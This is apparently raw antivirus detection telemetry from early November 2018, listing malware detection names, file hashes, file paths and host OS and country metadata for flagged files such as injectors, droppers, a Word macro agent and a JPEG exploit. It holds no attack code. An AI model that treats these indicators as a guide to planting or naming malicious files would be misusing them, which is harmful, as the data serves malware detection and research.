  Row(detection=Row(filename='avscan-20181102-054921-04254eb3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054921-04254EB3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062540-1733bbf2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062540-1733BBF2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051657-7d8f1905', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051657-7D8F1905', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055106-42c10047', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055106-42C10047', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052922-3933cfe9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052922-3933CFE9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055340-9e9c2fe6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055340-9E9C2FE6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052618-cc16919c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052618-CC16919C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050455-cef1adbd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050455-CEF1ADBD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060034-954c4549', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060034-954C4549', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052315-5e875fcf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052315-5E875FCF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052315-5eafaaf3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052315-5EAFAAF3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052335-6ac46f71', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052335-6AC46F71', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052657-e3394eff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052657-E3394EFF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061149-2774e4a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061149-2774E4A0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052151-2cadef95', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052151-2CADEF95', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054744-ca628200', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054744-CA628200', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060507-383f7ae1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060507-383F7AE1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052307-5a2319f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052307-5A2319F7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055504-d096083b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055504-D096083B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051831-b5a9047c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051831-B5A9047C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062610-28ae767e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062610-28AE767E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051621-67cf8d41', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051621-67CF8D41', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050437-c4115052', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050437-C4115052', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051157-cad3ae53', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051157-CAD3AE53', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053358-de22f82b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053358-DE22F82B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055910-635965b2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055910-635965B2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050636-0afca063', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050636-0AFCA063', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054326-304f7e5a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054326-304F7E5A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055944-774679ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055944-774679CA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055157-6113490b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055157-6113490B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T17:00:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052553-bcb0c61c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052553-BCB0C61C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060947-df1332a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060947-DF1332A3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051424-22570d78', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051424-22570D78', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062151-8e611bb7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062151-8E611BB7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051406-1765f366', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051406-1765F366', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054353-408fbb82', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054353-408FBB82', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053340-d35e1819', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053340-D35E1819', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050556-f39bec6d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050556-F39BEC6D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T00:00:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7d052a62c8aa657a311c064e86fc1ba3d7bebd35861fece30d3000429fed23d2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7D052A62C8AA657A311C064E86FC1BA3D7BEBD35861FECE30D3000429FED23D2', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7d052a62c8aa657a311c064e86fc1ba3d7bebd35861fece30d3000429fed23d2', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:18:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T09:14:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053229-a8dc9902', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053229-A8DC9902', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062438-f1f07364', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062438-F1F07364', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051758-a1920337', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051758-A1920337', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060158-c777746b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060158-C777746B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054331-33654740', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054331-33654740', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055959-80569e46', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055959-80569E46', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1f690db1ac2c8a3aa6328775ba3d6f9a31176dede908bef9b4b4b0e1d362d240', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\1F690DB1AC2C8A3AA6328775BA3D6F9A31176DEDE908BEF9B4B4B0E1D362D240', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1f690db1ac2c8a3aa6328775ba3d6f9a31176dede908bef9b4b4b0e1d362d240', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:24:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vrt17f6.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\VRT17F6.tmp', filesize=2176000, name='PUA/ICLoader.Gen7.#M300.#R604135'), hash='3186d10c3568de84c1543e9ca89d744f7877cc1565401b73af2ebd2df894a594', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:42:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154909-7c983bf1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154909-7C983BF1', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:49:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='upl ukl.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2016\\LPA\\LAPORAN UPL UKL\\UPL UKL.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T08:27:38Z'), dt=datetime.date(2018, 11, 1)),
